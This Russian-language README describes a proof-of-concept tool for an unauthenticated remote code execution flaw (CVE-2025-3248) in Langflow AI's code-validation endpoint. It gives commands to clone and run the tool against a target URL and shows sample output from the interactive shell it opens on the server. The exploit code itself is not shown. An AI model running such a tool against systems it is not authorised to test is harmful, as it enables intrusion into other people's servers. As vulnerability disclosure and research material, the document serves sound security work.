
Эксплойт для удаленного выполнения кода Langflow AI (без аутентификации)
Эта эксплойта нацелена на критическую уязвимость RCE без аутентификации (CVE-2025-3248) в Langflow AI. Уязвимость позволяет злоумышленнику выполнять произвольные системные команды на целевом сервере через конечную точку /api/v1/validate/code.
Этот инструмент proof-of-concept (PoC) предоставляет интерактивную оболочку для тестирования и демонстрации проблемы.
pip3 для установки зависимостейgit clone https://github.com/yourusername/CVE-2025-3248.git
cd CVE-2025-3248
pip3 install -r requirements.txt
python3 CVE-2025-3248.py -u http://TARGET_HOST:PORT
python3 CVE-2025-3248.py -u http://127.0.0.1:7860
Вам будет представлена интерактивная оболочка:
0xgh057r3c0n@root💀$ whoami
langflow
0xgh057r3c0n@root💀$ uname -a
Linux ubuntu 5.15.0-89-generic #99~20.04.1-Ubuntu SMP ...
exit или quitЭтот проект лицензирован по лицензии MIT — подробности см. в файле LICENSE.
Это программное обеспечение предоставляется только для образовательных и исследовательских целей. Автор не несет ответственности за любое неправомерное использование этого кода. Используйте только на системах, которыми вы владеете или на тестирование которых имеете явное разрешение.